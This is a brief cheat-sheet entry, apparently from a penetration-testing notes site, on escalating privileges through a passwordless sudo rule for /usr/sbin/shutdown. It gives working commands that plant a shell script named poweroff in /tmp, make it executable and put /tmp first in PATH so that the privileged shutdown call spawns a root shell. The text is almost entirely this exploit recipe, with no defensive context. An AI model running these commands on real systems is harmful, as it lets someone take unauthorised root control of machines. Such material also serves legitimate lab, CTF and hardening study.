Sudo Shutdown, Poweroff Privilege Escalation
Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc).
sudo -l
(ALL) NOPASS: /usr/sbin/shutdown
Copied!echo /bin/sh > /tmp/poweroff
# or
echo /bin/bash > /tmp/poweroff
Copied!chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
Copied!Last updated
